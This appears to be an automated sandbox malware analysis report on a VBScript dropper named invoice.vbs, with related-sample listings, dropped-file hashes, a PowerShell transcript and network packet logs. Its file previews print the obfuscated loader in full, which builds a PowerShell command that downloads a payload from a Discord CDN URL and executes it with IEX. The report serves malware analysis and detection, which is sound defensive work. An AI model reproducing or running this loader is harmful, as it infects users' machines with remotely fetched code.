skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:56:07	API Interceptor	37x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.130.233	order-confirmation.doc__.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
	SkKcQaHEB8.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	P20200107.DOC	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	G019 & G022 SPEC SHEET.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	Marking Machine 30W Specification.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	2021 RFQ Products Required.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
	Company Reference1.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
	PAY SLIP.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
	part1.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Wyzntjzprmmvqdtdrthurezrzhdavabchs.exe	Get hash	malicious	Browse	162.159.133.233
	Wyzntjzprmmvqdtdrthurezrzhdavabchs.exe	Get hash	malicious	Browse	162.159.135.233
	p2dWb5Rtrx.exe	Get hash	malicious	Browse	162.159.133.233
	JGJtVyC9dr.exe	Get hash	malicious	Browse	162.159.134.233
	Tzcyxxestkakhuvtmvfdserywturrfjrye.exe	Get hash	malicious	Browse	162.159.129.233
	85d8c.exe	Get hash	malicious	Browse	162.159.135.233
	85d8c.exe	Get hash	malicious	Browse	162.159.135.233
	TusisaehJA.exe	Get hash	malicious	Browse	162.159.133.233
	XWXJTOInGn.exe	Get hash	malicious	Browse	162.159.129.233
	NEW PO pdf.exe	Get hash	malicious	Browse	162.159.133.233
	QfVER41Fwx.exe	Get hash	malicious	Browse	162.159.134.233
	O3h9kRdG7d.exe	Get hash	malicious	Browse	162.159.133.233
	UnitySoft.exe	Get hash	malicious	Browse	162.159.133.233
	N45KX6gszh.exe	Get hash	malicious	Browse	162.159.135.233
	wRMhuAGuqA.exe	Get hash	malicious	Browse	162.159.135.233
	uVqhyi46OB.exe	Get hash	malicious	Browse	162.159.135.233
	93ejLcdBh5.exe	Get hash	malicious	Browse	162.159.133.233
	v7KRBuoOS2.exe	Get hash	malicious	Browse	162.159.130.233
	puzlXYxqKK.exe	Get hash	malicious	Browse	162.159.134.233
	YmBeugFEdl.exe	Get hash	malicious	Browse	162.159.130.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	kKZZ0J8y0c.exe	Get hash	malicious	Browse	104.21.19.200
	RFQ 29.exe	Get hash	malicious	Browse	104.21.19.200
	ATT80307.HTM	Get hash	malicious	Browse	104.16.19.94
	2C.TA9.HTML	Get hash	malicious	Browse	104.18.11.207
	Dosusign_Na_Sign.htm	Get hash	malicious	Browse	172.67.145.176
	RoyalMail_Requestform0729.exe	Get hash	malicious	Browse	172.67.188.154
	sbcss_Richard.DeNava_#inv0549387TWQYqzTPaYeqvaYMnpdIfJAwwzbguzauViQVRRplvOktNmAire.HTM	Get hash	malicious	Browse	104.16.18.94
	Fake.HTM	Get hash	malicious	Browse	104.16.19.94
	RoyalMail_Requestform1.exe	Get hash	malicious	Browse	172.67.188.154
	Nouveau bon de commande. 3007021_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	MFS0175, MFS0117 MFS0194.exe	Get hash	malicious	Browse	172.67.188.154
	ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe	Get hash	malicious	Browse	172.67.176.89
	Purchase Requirements.exe	Get hash	malicious	Browse	23.227.38.74
	items.doc	Get hash	malicious	Browse	104.21.19.200
	ZI09484474344.exe	Get hash	malicious	Browse	104.21.49.41
	#Ud83d#Udda8rocket.com 7335931#Ufffd90-queue-1675.htm	Get hash	malicious	Browse	104.16.19.94
	ATT66004.HTM	Get hash	malicious	Browse	104.16.19.94
	JUP2A9ptp5.exe	Get hash	malicious	Browse	104.21.19.200
	7vd7MuxjGd.exe	Get hash	malicious	Browse	104.21.92.87
	xar2.dll	Get hash	malicious	Browse	172.67.70.134

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	kKZZ0J8y0c.exe	Get hash	malicious	Browse	162.159.130.233
	RFQ 29.exe	Get hash	malicious	Browse	162.159.130.233
	3G1J49A6V_Invoice.vbs	Get hash	malicious	Browse	162.159.130.233
	Invoice_#.vbs	Get hash	malicious	Browse	162.159.130.233
	RoyalMail_Requestform0729.exe	Get hash	malicious	Browse	162.159.130.233
	RoyalMail_Requestform1.exe	Get hash	malicious	Browse	162.159.130.233
	MFS0175, MFS0117 MFS0194.exe	Get hash	malicious	Browse	162.159.130.233
	INVOICE.vbs	Get hash	malicious	Browse	162.159.130.233
	INQUIRY REQUIREMENTS.exe	Get hash	malicious	Browse	162.159.130.233
	JUP2A9ptp5.exe	Get hash	malicious	Browse	162.159.130.233
	7vd7MuxjGd.exe	Get hash	malicious	Browse	162.159.130.233
	KITCOFiberOptics_CompanyCertifcate.exe	Get hash	malicious	Browse	162.159.130.233
	LOPEZ CV.exe	Get hash	malicious	Browse	162.159.130.233
	PO_1994.exe	Get hash	malicious	Browse	162.159.130.233
	temple.exe	Get hash	malicious	Browse	162.159.130.233
	transferred $95,934.55 pdf.exe	Get hash	malicious	Browse	162.159.130.233
	gunzipped.exe	Get hash	malicious	Browse	162.159.130.233
	Remittance copy.pdf.exe	Get hash	malicious	Browse	162.159.130.233
	09087900900000000.exe	Get hash	malicious	Browse	162.159.130.233
	cjfq66QXN5.exe	Get hash	malicious	Browse	162.159.130.233

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Run\Run.vbs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	932
Entropy (8bit):	5.55730119041206
Encrypted:	false
SSDEEP:	12:PvzC6yh4Er1WI8fyAixHhZyMAHifvAeRoUVzM8NoeT8OobLqhP/v1VJv9Os/s:Pv2LrsItbfAMvAeym6bPiJFxs
MD5:	54D05FFF21AE2629575573F781EF23AF
SHA1:	CF689BCD497880A15FBB048126824F6484A933D1
SHA-256:	459D8640818DCDFB8BBE3AB6347EB9E9CE3BE2F2239ED61B69CAC93FC7F3AA35
SHA-512:	880741323D669B2A0B172F8B64361C62913634C83926EBAD969FFB9D1EEFAD4E68AA673FC31B88632F5017BBAEDE0264B0A9D9046C6A42A8B5DD74B43A3FE3D7
Malicious:	false
Reputation:	low
Preview:	Dim FBI..Set FBI= CreateObject("WScript.S"&"HELL")..Donal=chr(80) &"O" & Chr(87)..Trump = Chr(69)..mike = Chr(82) & "s"&"H" & Chr(69)..pompeo = Chr(76)..Elon =Chr(76)&" $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658269294137374/dola2020.txt';$"..WHO = "B ='E"..ERO = "TH COINt.WTF COINlIOSNT'.Re"..AA = "place('ETH COIN','nE').Repl"..BB = "ace('TF COIN','EbC').Rep"..CC = "lace('OS','e');"..MUSK = "$CC = 'DOS COIN L"&"SOSCOINnG'.Rep"..DD = "lace('S COIN ','Wn').Repl"..FF = "ace('SO','oaD').Rep"..GG = "lace('COIN','TrI');"..SHIB =""..INU ="$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Rep"..KK = "lace('os COIN','X(n`e').Repl"..TT = "ace('BTC COIN','-Ob').Rep"..ENB = "lace('TH COIN','`c`T');"..PUMP ="&('I'+'E"..OS = "X')($A -J"..SOS = "oin '')\|&('I'+'E"..EOS = "X');"..COIN = Donal+Trump++mike+pompeo+Elon+WHO+ERO+AA+BB+CC+MUSK+DD+FF+GG+SHIB+INU+KK+TT+ENB+PUMP+OS+SOS+EOS+""..FBI.Run COIN,0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57895
Entropy (8bit):	5.07724879463521
Encrypted:	false
SSDEEP:	1536:vvI+z30kaAxV3CNBQkj25h4iUxvaV7flJnVv6H15qdpnUSlQOdBQNUzktAHkbNK3:nI+z30NAxV3CNBQkj25qiUvaV7flJnV/
MD5:	ABF0CA1055207E755309961A7F660E0D
SHA1:	F886C56CCD77C17EBE81C8BFBFFCC42CBC614458
SHA-256:	F2161823E2B5F73BBD5C674EA1E610A412370E87E23377B9DB1E6451F5417139
SHA-512:	3535DB5640324B1E39616B23F30BE723F16446E5747A5FEC69F8090C0EDEE489E129BA9C6CC1EB5E290620570DFABC73F1CF116042B006BD692F7671A078D4CC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.X..........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evfblz0q.2mw.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttgqezgt.k4l.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Documents\20210803\PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	4479
Entropy (8bit):	5.604065630743207
Encrypted:	false
SSDEEP:	96:BZjhONflrHqDo1ZVlrOZXhONflrHqDo1ZhV6vyGLGLwNZx:gxDxfxn8vyGLGLwx
MD5:	6D5899D54AF10ABB04841CAD8B46FD5E
SHA1:	5028D8136A64A823EE41E5D4C64C78B052CBEC61
SHA-256:	266A16C704778B6986DAFDEA46465D7ED598FFE2145872B54609BC8889FA9E64
SHA-512:	47F861A93D433E8788B80A7C63ADA670644FEA844B5854FD9AFE26C9ED896D149498DD2F84EDE4DB439F2A724F7C5AB1EE25742AE74F7D980DE1004E06BCF768
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\Documents\20210803\PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt, Author: Joe Security
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210803225606..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 019635 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');..Process ID: 6080..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVer

Static File Info

General
File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.559292058523386
TrID:
File name:	invoice.vbs
File size:	932
MD5:	8a757e0b2f51327cc27b6fdba4ffd404
SHA1:	67cfc2866f5e88bb2daf4a84de61835b940266a1
SHA256:	56073b63e9b1c977aab82d11f1bf9098a78b16f99158a95810d2d21df097e164
SHA512:	5a6affa81f9ad7d2708b412f938b3ca5c0395d73b408e1af174e78f1d8c06886c003753b08d4b88d4f24be8a04fa67788d0199db3c15482c8189177d8d1cc5b7
SSDEEP:	12:PvUC6yh4Er1W47f8fyAixHhZyMAHifvAeRoUVzM8NoeT8OobLqhP/v1VJv9Os/V:PvnLrcMftbfAMvAeym6bPiJFxV
File Content Preview:	Dim FBI....Set FBI= CreateObject("WScript.S"&"HELL")..Donal=chr(80) &"O" & Chr(87)..Trump = Chr(69)..mike = Chr(82) & "s"&"H" & Chr(69)..pompeo = Chr(76)..Elon =Chr(76)&" $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/86965850375993760

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
08/03/21-22:56:45.626965	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:56:46.647191	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:07.907447	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:08.955553	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:15.028670	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:26.165272	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:37.313672	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:43.368619	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:57:54.525385	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:58:05.878096	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:58:17.107682	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:58:43.442053	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:58:49.494411	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:00.659596	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:01.664061	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:12.784274	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:18.909313	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:19.917089	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:25.971071	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8
08/03/21-22:59:32.020162	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.3	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 22:56:08.307429075 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.325557947 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.325721025 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.339970112 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.358344078 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.361228943 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.361290932 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.361340046 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.361362934 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.365833044 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.382714987 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.383043051 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.406816959 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.423856974 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.701788902 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.701832056 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.701869965 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.701895952 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.701913118 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.701931953 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:08.701952934 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:08.753809929 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.041117907 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.058432102 CEST	443	49722	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.058597088 CEST	49722	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.083009958 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.100629091 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.101358891 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.101917028 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.118594885 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.119896889 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.129458904 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.146326065 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641412973 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641462088 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641498089 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641525030 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641561031 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641604900 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.641623974 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641637087 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.641668081 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.641668081 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641720057 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641748905 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641786098 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641810894 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641836882 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.641849041 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.641865015 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641908884 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.641917944 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.641954899 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.642052889 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.642090082 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.642107964 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.642137051 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.642144918 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.642189980 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.642369032 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.642935038 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.642982960 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643024921 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643062115 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643094063 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.643122911 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.643768072 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643809080 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643845081 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643892050 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.643910885 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.643934965 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.644541979 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.644582987 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.644618034 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.644646883 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.644666910 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.645282984 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.653270960 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.658674955 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.658746958 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.658807039 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.658838987 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.658860922 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.658866882 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.658977032 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659044027 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659102917 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.659106970 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659172058 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.659208059 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659835100 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659890890 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659941912 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.659976006 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.659993887 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.660001040 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.660676003 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.660744905 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.660799026 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.660830021 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.660856009 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.660866022 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.661483049 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.661540031 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.661592960 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.661628962 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.661645889 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.661652088 CEST	49729	443	192.168.2.3	162.159.130.233
